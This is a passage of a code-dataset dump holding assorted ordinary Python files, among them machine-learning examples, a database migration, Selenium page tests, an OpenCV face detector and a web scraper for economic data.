digits.target):\r\n ax.set_axis_off()\r\n ax.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest')\r\n ax.set_title('Training: %i' % label)\r\n\r\n\r\n#flatten the images\r\n#i.e. turn each 2D array of grayscale values from shape (8, 8) into shape (64,)\r\n# entire dataset will be of shape (n_samples,n_features)\r\n#n_samples: no. of images; n_features: total number of pixels in each image\r\nn_samples = len(digits.images)\r\ndata = digits.images.reshape((n_samples, -1))\r\n#-1: value is inferred from length of array & remaining dimensions\r\n\r\n# Create a classifier: a support vector classifier\r\n#Also try with 'poly' and ‘sigmoid' kernels and different values of gamma\r\nclf = svm.SVC(kernel='rbf', gamma=0.001)\r\n\r\n# Split data into 50% train and 50% test subsets\r\nX_train, X_test, y_train, y_test = train_test_split(data, digits.target, test_size=0.5, shuffle=False)\r\n\r\n# Learn the digits on the train subset\r\nclf.fit(X_train, y_train)\r\n\r\n# Predict the value of the digit on the test subset\r\npredicted = clf.predict(X_test)\r\n_, axes = plt.subplots(nrows=1, ncols=4, figsize=(10, 3))\r\nfor ax, image, prediction in zip(axes, X_test, predicted):\r\n ax.set_axis_off()\r\n image = image.reshape(8, 8)\r\n ax.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest')\r\n ax.set_title(f'Prediction: {prediction}')\r\n\r\ndisp = metrics.plot_confusion_matrix(clf, X_test, y_test)\r\ndisp.figure_.suptitle(\"Confusion Matrix\")\r\nprint( f\"Confusion matrix:\\n{disp.confusion_matrix}\")\r\nplt.show()","sub_path":"Support Vector Machine.py","file_name":"Support Vector Machine.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42917779","text":"\"\"\"empty message\n\nRevision ID: 26eae050829d\nRevises: 302baee6981f\nCreate Date: 2017-01-10 12:33:15.506871\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '26eae050829d'\ndown_revision = '302baee6981f'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('province',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('code', sa.String(length=10), nullable=True),\n sa.Column('keyword', sa.String(length=150), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('district',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('code', sa.String(length=10), nullable=True),\n sa.Column('province_code', sa.String(length=10), nullable=True),\n sa.Column('province_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['province_id'], ['province.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('sector',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('code', sa.String(length=100), nullable=True),\n sa.Column('district_code', sa.String(length=10), nullable=True),\n sa.Column('district_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['district_id'], ['district.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('sector')\n op.drop_table('district')\n op.drop_table('province')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/26eae050829d_.py","file_name":"26eae050829d_.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"81988651","text":"# CC notes 17: Chap 8 - Functions\n\n''' Passing an arbitrary number of arguments: \n - Uses the * operator which packs the arbitrary number of arguments into\n a tuple\n \n - Python will pack the argument into a tuple even if it is given only one\n argument. \n'''\ndef make_pizza(*toppings):\n print(toppings)\n \nmake_pizza('pepperoni',)\nmake_pizza('mushrooms', 'green peppers', 'extra cheese')\n\nprint('\\nReplacing the print statement and adding a loop:')\n\ndef make_pizza_01(*toppings):\n \n print('\\nMaking a pizza with the following toppings:')\n for topping in toppings:\n print(\"- \" + topping)\n \nmake_pizza_01('pepperoni',)\nmake_pizza_01('mushrooms', 'green peppers', 'extra cheese')\n\n''' Mixing Positional and Arbitrary arguments:\n - The parameter that accepts an arbitrary number of arguments must be listed\n last in the arguments list of the function:\n'''\ndef make_pizza_02(size, *toppings):\n print(\"\\nMaking a \" + str(size) + \"-inch pizza with the following toppings:\")\n \n for topping in toppings:\n print(\"- \" + topping)\n\nprint(\"\\nMixing Positional & Arbitrary arguments example:\")\n \nmake_pizza_02(16, 'pepperoni',)\nmake_pizza_02(12, 'mushrooms', 'green peppers', 'extra cheese')\n\n''' Python stores the first value received in the parameter 'size', all following\n values are stored in the tuple 'toppings'.\n'''\n\n''' Arbitrary keyword arguments: \n\n Want to accept as many key-value pairs as necessary, but don't know what kind \n of info will be put there:\n'''\n\nprint(\"\\nArbitrary keyword arguments:\\n\")\n\ndef build_profile(first, last, **user_info):\n \n profile = {}\n profile['first name'] = first\n profile['last name'] = last\n \n for key, value in user_info.items():\n profile[key] = value\n \n return profile\n\nuser_profile = build_profile('albert', 'einstein', location = 'princeton',\n field = 'physics')\nprint(user_profile)\n\nprint(\"\\nTry it yourself exercises:\")\nprint(\"\\n8-12: Sandwiches:\")\n\ndef sandwich_ingredients(*items):\n \n print(\"\\nThe sandwich ordered has the following items on it:\")\n for item in items:\n print(\"- \" + item)\n \nsandwich_ingredients('roast beef',)\nsandwich_ingredients('ham', 'cheese')\nsandwich_ingredients('salami', 'bologna', 'pepperjack cheese')\n\nprint(\"\\n8-13: User Profile:\")\n\nmy_profile = build_profile(\"Lucius\", \"Vorenus\", profession = \"centurion\", \n legion = \"11th\", commander = \"caesar\")\n\nprint(my_profile)\n\nprint(\"\\n8-14: Cars:\")\n\ndef make_car(make, model, **optional):\n \n car_profile = {}\n car_profile[\"make\"] = make\n car_profile[\"model\"] = model\n \n for key, value in optional.items():\n car_profile[key] = value\n \n return car_profile\n\ncar = make_car('subaru', 'outback', color = 'blue', tow_package = True)\nprint(car)","sub_path":"Python_Crash_Course_text/Crash_course_notes_17.py","file_name":"Crash_course_notes_17.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152789665","text":"# -*- coding:UTF-8 -*-\n#$/Service/__init__.py\n#Date:2013-09-09\n\nimport base64\nimport traceback\n\nfrom config import *\nfrom threading import Thread\nfrom datetime import datetime\nfrom mysql import connector\nfrom DBUtils.PooledDB import PooledDB\n\n__all__ = [\n\t\t'_get_connect',\n\t\t'verify_token'\n\t\t]\n\ndef _get_connect():\n\treturn _pool.connection() \n\ndef verify_token(token):\n\t'''verify token weather still valid\n\treturn (0)no_token or (-1)token_overdate or user_id\n\t'''\n\tconn = _get_connect()\n\tcur = conn.cursor()\n\ttry:\n\t\treturn cur.callproc('sp_verify_token', (token,\n\t\t\tTOKEN_VALID_DAY, 0))[2]\n\texcept Exception:\n\t\tprint('===============caught exception=============')\n\t\tprint(traceback.format_exc())\n\tfinally:\n\t\tcur.close()\n\t\tconn.close()\n\ndef _build_insert_sql(table, columns):\n\tc = len(columns)\n\tsql = 'INSERT INTO ' + table + '(' + ('%s,' * c)[0:-1] + ')'\n\tsql %= columns\n\tsql += 'VALUES(' + ('%s,' * c)[0:-1] + ')'\n\treturn sql\n\n#init db connection pool\n_pool = PooledDB(connector, mincached=1, maxusage=5,\n\thost='localhost', user='travo',\n\tpasswd='travo',db='travo')\n","sub_path":"Travo-Server/travo/service/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510067274","text":"#!/usr/bin/python\r\n#coding=utf-8 \r\n\r\n\"\"\"\r\nCopyright 2012 Telefonica Investigación y Desarrollo, S.A.U\r\n\r\nThis file is part of Billing_PoC.\r\n\r\nBilling_PoC is free software: you can redistribute it and/or modify it under the terms \r\nof the GNU Affero General Public License as published by the Free Software Foundation, either \r\nversion 3 of the License, or (at your option) any later version.\r\nBilling_PoC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even \r\nthe implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero \r\nGeneral Public License for more details.\r\n\r\nYou should have received a copy of the GNU Affero General Public License along with Billing_PoC. \r\nIf not, see http://www.gnu.org/licenses/.\r\n\r\nFor those usages not covered by the GNU Affero General Public License please contact with::mac@tid.es\r\n\"\"\" \r\n\r\n'''\r\nCreated on 31/10/2012\r\n\r\n@author: mac@tid.es\r\n'''\r\n\r\nfrom common.salesforce.salesforce import get_customers\r\n\r\ndef get_customer_details_from_sf(account_id):\r\n \r\n (contact, account) = get_customers(account_id)\r\n \r\n if contact == None:\r\n return {}\r\n\r\n return {\r\n 'name' : account.Name, \r\n 'address' : account.BillingStreet, \r\n 'city' : account.BillingCity, \r\n 'postal_code': account.BillingPostalCode, \r\n 'email' : contact.Email,\r\n 'country' : account.BillingCountry,\r\n 'order' : 'f4f5e91595'\r\n }\r\n\r\ndef customer_details_from_sf(invoice_json):\r\n account_id = invoice_json['contract']\r\n \r\n # Adding customer details\r\n invoice_json['customer'] = get_customer_details_from_sf(account_id)\r\n \r\n return invoice_json","sub_path":"invoicer/customer/salesforce.py","file_name":"salesforce.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142481649","text":"import matplotlib.pyplot as plt\nfrom scipy import spatial\nfrom PIL import Image\nimport numpy as np\n\n# 读取图片,并且修改图片大小\nG_sm = np.array(Image.open('2.jpg').resize([100, 100]).getdata()).reshape([100, 100, 3]) / 256\n\n# 显示图片\nplt.figure()\nplt.imshow(G_sm)\nplt.title('Original Image')\nplt.show()\n\n# 读取emoji数据\nemoji_array = np.load(\"emojis_16.npy\")\n\n# 获取emoji的平均颜色值\nemoji_mean_array = np.array([ar.mean(axis=(0, 1)) for ar in emoji_array])\n\n# 将得到的每个emoji平均颜色值存储在树中以加快搜索速度\ntree = spatial.KDTree(emoji_mean_array)\n\nindices = []\n# 平整数组,一维\nflattened_img = G_sm.reshape(-1, G_sm.shape[-1])\nprint(flattened_img.shape)\n\n# 匹配最相似的表情符号的像素\nfor pixel in flattened_img:\n pixel_ = np.concatenate((pixel, [1]))\n # 查询最近的索引\n _, index = tree.query(pixel_)\n indices.append(index)\n\n# 从索引中获取对应的表情符号\nemoji_matches = emoji_array[indices]\n\n# 获取图片的高度\ndim = G_sm.shape[0]\nprint(dim)\n\n# 设置最终生成图像的大小,每个表情符号的形状都是(16,16,4),R, G, B, alpha\nresized_ar = emoji_matches.reshape((dim, dim, 16, 16, 4))\n\n# 转换单个表情符号补丁(5维)\n# 使用numpy块生成完整的图像(三维)\nfinal_img = np.block([[[x] for x in row] for row in resized_ar])\n\n# 设置画布\nplt.figure()\n# 去除坐标轴\nplt.axis('off')\n# 显示图片\nplt.imshow(final_img)\n# 保存emoji马赛克风格图像,去除白边\nplt.savefig('image_emoji.png', bbox_inches=\"tight\", pad_inches=0.0, dpi=600)\n\nplt.show()\n","sub_path":"Emoji.py","file_name":"Emoji.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395756121","text":"import sys\nx = int(input())\n\na = 0\nwhile a < 1000:\n b = -1000\n while b < 1000:\n if a ** 5 - b ** 5 == x:\n print(a, b)\n sys.exit()\n b += 1\n a += 1","sub_path":"beginner_contest166/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598054572","text":"# coding=utf-8\nimport unittest\nimport time\n\nfrom pages.video_page.page_object import VideoPage\nfrom pages.videos_page.page_object import VideosPage\nfrom pages.login_page.page_object import LoginPage\nfrom pages.admin_page.page_object import AdminPage\nfrom pages.admin_page.videos_create_page import VideosCreatePage\nfrom pages.favorites_video_page.page_object import FavoritesVideoPage\n\nfrom configuration import TEST_USER_EMAIL, TEST_USER_PASSWORD\n\n\nfrom utils.utils import get_remote_driver, get_language_from_url\nfrom utils.waiter import wait_for_animation_stopped\n\n\nclass VideoTest(unittest.TestCase):\n COUNT_TEST_VIDEO = 5\n VIDEO_TITLE = 'VIDEO_{0}_TITLE'\n\n @classmethod\n def setUpClass(cls):\n driver = get_remote_driver()\n admin_page = AdminPage(driver)\n admin_page.open()\n admin_page.login()\n videos_page = VideosCreatePage(driver)\n\n for i in range(1, cls.COUNT_TEST_VIDEO):\n video_data = videos_page.load_video(i)\n videos_page.open()\n videos_page.open_video_created_page()\n videos_page.set_fields_from_resours(video_data)\n videos_page.save_video()\n setattr(cls, cls.VIDEO_TITLE.format(i), video_data['title'])\n\n videos_page.search_video(cls.VIDEO_1_TITLE)\n cls.VIDEO_ID = videos_page.get_id_video(cls.VIDEO_1_TITLE)\n\n admin_page.logout()\n driver.quit()\n\n def setUp(self):\n self.driver = get_remote_driver()\n self.video_page = VideoPage(self.driver, self.VIDEO_ID)\n self.video_page.open()\n self.LANGUAGE = get_language_from_url(self.driver)\n wait_for_animation_stopped(self.driver)\n\n def test_01_video_page_exists(self):\n self.assertEquals(self.video_page.title, self.video_page.expected_title)\n\n def test_video_plays(self):\n self.video_page.click_on_video()\n is_youtube_video_presented = self.video_page.is_youtube_video_presented()\n self.assertTrue(is_youtube_video_presented)\n\n def test_click_on_tag_on_video_page_leads_to_filtering_by_tag(self):\n first_item_tag = self.video_page.get_first_tag()\n self.video_page.click_on_first_tag()\n videos_page = VideosPage(self.driver)\n items_are_filtered = True\n for i in xrange(1, videos_page.videos.get_size()):\n video_item = videos_page.videos.get_video(i)\n if first_item_tag in video_item.get_tags():\n continue\n else:\n items_are_filtered = False\n break\n self.assertTrue(items_are_filtered)\n\n def test_click_on_category_on_video_page_leads_to_filtering_by_category(self):\n category = self.video_page.get_category()\n self.video_page.click_on_category()\n videos_page = VideosPage(self.driver)\n items_are_filtered = True\n for i in xrange(1, videos_page.videos.get_size()):\n video_item = videos_page.videos.get_video(i)\n if video_item.get_category() == category:\n continue\n else:\n items_are_filtered = False\n break\n self.assertTrue(items_are_filtered)\n\n def test_go_to_related_video(self):\n first_related_video_title = self.video_page.get_first_related_video_title()\n self.video_page.go_first_related_video()\n related_video_page = VideoPage(self.driver)\n self.assertEquals(first_related_video_title, related_video_page.get_video_title())\n\n def test_click_on_tag_on_related_video_leads_to_filtering_by_tag(self):\n self.video_page.go_first_related_video()\n related_video_page = VideoPage(self.driver)\n first_related_video_tag = related_video_page.get_first_tag()\n\n related_video_page.click_on_first_tag()\n videos_page = VideosPage(self.driver)\n items_are_filtered = True\n for i in xrange(1, videos_page.videos.get_size()):\n video_item = videos_page.videos.get_video(i)\n if first_related_video_tag in video_item.get_tags():\n continue\n else:\n items_are_filtered = False\n break\n self.assertTrue(items_are_filtered)\n\n # Кнопки \"Все похожие видео\" больше нет\n # def test_click_show_all_related_videos(self):\n # self.video_page.go_all_related_videos()\n # is_current_url_contains_parameter = \"rel=\" + str(self.VIDEO_ID) in self.driver.current_url\n # self.assertTrue(is_current_url_contains_parameter)\n\n def test_call_auth_popup_after_click_on_play_more_than_two_times(self):\n is_auth_popup_showed = False\n\n current_video_page = self.video_page\n for i in range(1, 5):\n current_video_page.go_first_related_video()\n current_video_page = VideoPage(self.driver)\n current_video_page.click_on_video()\n if current_video_page.auth_popup_is_showed():\n is_auth_popup_showed = True\n continue\n\n self.failUnless(is_auth_popup_showed is True)\n current_video_page.click_on_auth_button_in_popup()\n login_page = LoginPage(self.driver)\n self.assertEqual(login_page.url, login_page.expected_url)\n\n def test_call_auth_popup_and_redirect_to_video_after_click_favorite_star(self):\n video_url = self.video_page.url\n self.video_page.click_on_favorite_star()\n self.video_page.click_on_auth_button_in_popup()\n\n login_page = LoginPage(self.driver)\n login_page.form.set_email(TEST_USER_EMAIL)\n login_page.form.set_password_1(TEST_USER_PASSWORD)\n login_page.form.submit_form()\n\n redirect_to_video_url = self.driver.current_url\n self.assertEqual(redirect_to_video_url.replace('{0}/'.format(self.LANGUAGE), ''), video_url)\n\n def test_add_video_in_favorites(self):\n login_page = LoginPage(self.driver)\n login_page.open()\n\n login_page.form.set_email(TEST_USER_EMAIL)\n login_page.form.set_password_1(TEST_USER_PASSWORD)\n login_page.form.submit_form()\n\n self.video_page.open()\n video_title = self.video_page.get_video_title()\n self.video_page.click_on_favorite_star()\n\n favourites_video_page = FavoritesVideoPage(self.driver)\n favourites_video_page.open()\n self.failUnlessEqual(favourites_video_page.videos.get_video().get_title(), video_title)\n\n self.video_page.open()\n self.video_page.click_on_favorite_star()\n\n favourites_video_page.open()\n self.failIfEqual(favourites_video_page.videos.get_video().get_title(), video_title)\n\n def tearDown(self):\n self.driver.quit()\n\n @classmethod\n def tearDownClass(cls):\n driver = get_remote_driver()\n admin_page = AdminPage(driver)\n admin_page.open()\n admin_page.login()\n videos_page = VideosCreatePage(driver)\n\n videos_page.open()\n videos_page.search_video(cls.VIDEO_1_TITLE)\n\n for i in range(1, cls.COUNT_TEST_VIDEO):\n videos_page.delete_created_video(getattr(cls, cls.VIDEO_TITLE.format(i)))\n\n admin_page.logout()\n driver.quit()\n","sub_path":"tests/test_video_page.py","file_name":"test_video_page.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91657824","text":"# -*- coding: utf-8 -*-\n\"\"\"Exercise 3.\n\nRidge Regression\n\"\"\"\n\nimport numpy as np\n\n\ndef ridge_regression(y, tx, lambda_):\n \"\"\"implement ridge regression.\"\"\"\n reg = 2 * len(tx) * lambda_ * np.identity(tx.shape[1])\n lt = np.dot(tx.T, tx) + reg\n rt = np.dot(tx.T, y)\n # solve seems to work better than inv?\n opt_weights = np.linalg.solve(lt, rt)\n return opt_weights\n","sub_path":"labs/ex04/template/ridge_regression.py","file_name":"ridge_regression.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84808662","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"ニュース view\"\"\"\n\n# ##########################################################\n# Copyright 2016 Miyamoto. All Rights Reserved.\n#\n# app.views.news\n#\n# 履歴:\n# Date Version Updater Description\n# 2016/01/31 1.0.0 Miyamoto 初版。\n# ##########################################################\n\nimport os\n\nfrom flask import Blueprint, send_from_directory, current_app\n\n# ニュース用 Blueprint を定義\nbp = Blueprint('news', __name__, url_prefix='/news')\n\n\n@bp.route('/news.json', methods=['GET'])\ndef news():\n \"\"\"\n ニュース\n\n :return: static/json/news.json\n \"\"\"\n\n # static ファイルを返す\n return send_from_directory(\n os.path.join(current_app.root_path, 'static'),\n 'json/news.json',\n mimetype='application/json'\n )\n","sub_path":"app/views/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360409655","text":"import cv2\nalg = \"haarcascade_frontalface_default.xml\"\nhaar_cascade = cv2.CascadeClassifier(alg)\ncam = cv2.VideoCapture(0)\n\nwhile True:\n text = \"Face Not Detected\"\n _,img = cam.read()\n grayImg = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n face = haar_cascade.detectMultiScale(grayImg,1.3,4)\n for (x,y,w,h) in face:\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\n text = \"Face Detected\"\n print(text)\n cv2.putText(img,text,(10,20),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,255),2)\n cv2.imshow(\"FaceDetection\",img)\n key = cv2.waitKey(10)\n if key == 27:\n break\n\ncam.release()\ncv2.destroyAllWindows()\n","sub_path":"FaceDetectionUsingOpenCV.py","file_name":"FaceDetectionUsingOpenCV.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193396206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2018/11/15 14:01\n@Author : LI Zhe\n\"\"\"\nimport torch\nfrom torch.utils.data import DataLoader\nimport torchvision\nfrom torchvision import transforms, utils\nimport matplotlib.pyplot as plt\n\nimg_data = torchvision.datasets.ImageFolder('./../data/flower_photos',\n transform=transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224), # 中心化\n transforms.ToTensor()\n ])\n )\nprint(len(img_data))\ndata_loader = DataLoader(img_data, batch_size=20, shuffle=True)\nprint(len(data_loader))\n\ndef show_batch(imgs):\n grid = utils.make_grid(imgs, nrow=5)\n plt.imshow(grid.numpy().transpose(1, 2, 0))\n plt.title('Batch from dataloader')\n\nfor i, (batch_x, batch_y) in enumerate(data_loader):\n if i < 4:\n print(i, batch_x.size(), batch_y.size())\n show_batch(batch_x)\n print(batch_y)\n plt.axis('off')\n plt.show()","sub_path":"PyTorch/Make_own_datasets/mydataset_from_flowers.py","file_name":"mydataset_from_flowers.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"432177367","text":"# regex search.py - opens all .txt files in a folder and searches for any line\n# that matches a user-supplied regular expression\n\n\nimport re, os\n\n\nfilePath = '.'\nregexFile = re.compile(r'.*\\.txt')\n# Ask user for the keyword he wants to search\nuserSearch = input('What do you want to search?: ')\nuserRegex = re.compile(userSearch, re.I)\n\n\ndef searchTextFiles(path):\n files = [f for f in os.listdir() if regexFile.match(f)]\n matchCount = 0\n print('Matches found in file(s):')\n for file in files:\n openFile = open(file, 'r')\n matches = userRegex.findall(openFile.read())\n if matches:\n matchCount += 1\n print(file)\n print('Occurrences: ', len(matches))\n if not matchCount:\n print('There is no \"%s\" keyword in any of the files' % userSearch)\n\n\nsearchTextFiles(filePath)\n\n","sub_path":"SearchKeywordInFiles/matchingRegex.py","file_name":"matchingRegex.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592570435","text":"import argparse\nimport logging\nimport tempfile\nimport os\nimport sys\nfrom typing import Literal, Optional\nfrom functools import cached_property\nimport yaml\n\nfrom mirage.sim import Simulation, MacrolensingSimulation, MicrolensingSimulation\nfrom mirage.util import Dictify, ClusterProvider, LocalClusterProvider\nfrom mirage.calc import reducers\nfrom mirage.calc.batch_runner import BatchRunner\n\nlogger = logging.getLogger(\"mirage_main\")\n\n\nclass MirageMain:\n\n def __init__(self):\n self.parser = argparse.ArgumentParser()\n self._bind_arguments()\n self.args = self.parser.parse_args()\n self.configure_logger()\n\n def _bind_arguments(self):\n a = self.parser\n self.parser.add_argument(\n \"-r\",\n \"--read_sim\",\n type=str,\n required=False,\n nargs=1,\n help=\"Simulation yaml file to load\",\n )\n self.parser.add_argument(\n \"-c\",\n \"--cluster\",\n required=False,\n nargs=1,\n type=str,\n default=\"cluster.yaml\",\n help=\"Filename containing the cluster spec to use. If not provided, the program\"\n \"looks for a `cluster.yaml` in the current directory. Otherwise, a default\"\n \"cluster on localhost is provisioned\",\n )\n self.parser.add_argument(\n \"-w\",\n \"--write\",\n required=False,\n nargs=1,\n type=str,\n help=\"The file to write the results of the simulation to.\"\n \"Ignored if runing in interractive mode.\",\n )\n self.parser.add_argument(\n \"-l\",\n \"--logs_directory\",\n type=str,\n required=False,\n nargs=1,\n help=\"directory to save logs to. If not provided a temporary directory is chosen\",\n )\n self.parser.add_argument(\n \"-v\", \"--viz\", action=\"store_true\", help=\"Launch in visualization mode\"\n )\n self.parser.add_argument(\n \"-i\",\n \"--interractive\",\n action=\"store_true\",\n help=\"Launch in interractive mode\",\n )\n self.parser.add_argument(\"--debug\", action=\"store_true\", help=\"Log debug messages\")\n self.parser.add_argument(\n \"-f\",\n \"--force\",\n action=\"store_true\",\n help=\"If specified, overwirtes output file if it already exists\",\n )\n\n @cached_property\n def logfile(self) -> str:\n if self.args.logs_directory:\n directory = self.args.logs_directory[0]\n directory = os.path.join(tempfile.gettempdir(), \"mirage\", \"logs\")\n os.makedirs(directory, exist_ok=True)\n existing_files = os.listdir(directory)\n return os.path.join(directory, f\"debug_{len(existing_files)}.log\")\n\n def configure_logger(self):\n logging.basicConfig(\n level=logging.DEBUG if self.args.debug else logging.INFO,\n format=\"%(asctime)s [%(processName)15s] %(levelname)5s - %(name)s | %(message)s\",\n handlers=[\n logging.FileHandler(self.logfile),\n logging.StreamHandler(sys.stdout),\n ],\n )\n logger.info(\"Writing logs to \" + self.logfile)\n\n @property\n def run_mode(self) -> Literal[\"batch\", \"interractive\", \"viz\"]:\n if self.args.viz:\n return \"viz\"\n if self.args.interractive:\n return \"interractive\"\n return \"batch\"\n\n @property\n def output_file(self) -> Optional[str]:\n if self.args.write:\n output_name = self.args.write[0]\n if not output_name.endswith(\".zip\"):\n output_name = output_name + \".zip\"\n if os.path.exists(output_name) and not self.overwrite:\n raise ValueError(\n f\"Output file {output_name} already exists.\"\n \" To overwrite, please try again with the '-f' flag\"\n )\n return output_name\n return None\n\n @property\n def cluster_provider(self) -> ClusterProvider:\n try:\n cluster = Dictify.from_yaml(ClusterProvider, self.args.cluster[0]) # type: ignore\n logger.info(\n f\"Constructed {type(cluster).__name__} cluster from file {self.args.cluster[0]}\"\n )\n return cluster\n except FileNotFoundError:\n logger.info(\"No cluster config file found. Using default local cluster\")\n return LocalClusterProvider()\n\n @property\n def overwrite(self) -> bool:\n return bool(self.args.force)\n\n def load_simulation(self) -> Optional[Simulation]:\n if not self.args.read_sim:\n return None\n\n sim_file = self.args.read_sim[0]\n if not os.path.exists(sim_file):\n raise ValueError(f\"File not found: {sim_file}\")\n\n logger.info(f\"Loading simulation from file: {sim_file}\")\n\n with open(sim_file) as f:\n yaml_str = f.read()\n logger.debug(\"Contents:\\n\" + yaml_str)\n\n sim_dict = yaml.load(yaml_str, yaml.CLoader)\n\n simulation = Simulation.from_dict(sim_dict) # type: ignore\n\n logger.info(f\"Constructed Simulation of type: {type(simulation).__name__}\")\n return simulation\n\n\nif __name__ == \"__main__\":\n main = MirageMain()\n\n simulation = main.load_simulation()\n run_mode = main.run_mode\n\n if run_mode == \"batch\" and simulation and main.output_file:\n logger.info(\"Running Batch Job\")\n batch_runner = BatchRunner(simulation, main.output_file, main.cluster_provider)\n batch_runner.start()\n logger.info(\"Goodbye!\")\n\n if run_mode == \"interractive\":\n raise NotImplementedError()\n\n if run_mode == \"viz\" and simulation:\n from mirage.viz import VizRunner\n\n logger.info(\"Running visualization\")\n viz_runner = VizRunner(simulation)\n viz_runner.start()\n logger.info(\"Goodbye!\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59581950","text":"import os\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\n# --------------------------------------------- Create contents ----------------------------------------------------- #\n# hits the newswires at 8:30 a.m. Eastern Time on the first Friday of every month;\n# along with first revision to prior month and second revision to two month earlier\ndef generate_html(today):\n url = 'https://tradingeconomics.com/united-states/non-farm-payrolls'\n page = requests.get(url)\n content = page.content.decode('utf-8')\n soup = BeautifulSoup(page.content, 'html.parser')\n\n cols = ['Calendar', 'GMT', 'Reference', 'Actual', 'Previous', 'Consensus', 'TEForecast']\n df = pd.DataFrame(columns=cols)\n row = {}\n i = 0\n for td in soup.find_all(\"td\"):\n txt = td.get_text().strip()\n try:\n dt = datetime.strptime(txt, '%Y-%m-%d')\n if len(row) > 0:\n df_row = pd.DataFrame(row, index=[row['Calendar']])\n df = pd.concat([df, df_row], axis=0)\n row['Calendar'] = dt\n i = 1\n except: # dt is not date\n if 'non farm payrolls' in txt.lower():\n continue\n if i < 1:\n continue\n try:\n row[cols[i]] = txt\n i = i + 1\n except:\n break\n df.set_index('Calendar', inplace=True)\n\n release_date = df[df.Actual != ''].index[-1]\n\n if release_date.month < today.month: # monthly update\n return None\n\n url = 'https://tradingeconomics.com/united-states/unemployment-rate'\n page = requests.get(url)\n content = page.content.decode('utf-8')\n soup = BeautifulSoup(page.content, 'html.parser')\n\n cols = ['Calendar', 'GMT', 'Reference', 'Actual', 'Previous', 'Consensus', 'TEForecast']\n df2 = pd.DataFrame(columns=cols)\n row = {}\n i = 0\n for td in soup.find_all(\"td\"):\n txt = td.get_text().strip()\n try:\n dt = datetime.strptime(txt, '%Y-%m-%d')\n if len(row) > 0:\n df_row = pd.DataFrame(row, index=[row['Calendar']])\n df2 = pd.concat([df2, df_row], axis=0)\n row['Calendar'] = dt\n i = 1\n except: # dt is not date\n if 'unemployment rate' in txt.lower():\n continue\n if i < 1:\n continue\n try:\n row[cols[i]] = txt\n i = i + 1\n except:\n break\n df2.set_index('Calendar', inplace=True)\n\n title = '

Monthly Mon-farm Payroll and Unemployment Rate

'\n body = df.to_html(border=None) # .replace('border=\"1\"','')\n body2 = df2.to_html(border=None) # .replace('border=\"1\"','')\n\n # --------------------------------------- Create and Send out HTML ------------------------------------------------- #\n\n html_string = f'''\n \n \n \n \n \n \n \n \n \n
{title}
\n
{body}
\n
{body2}
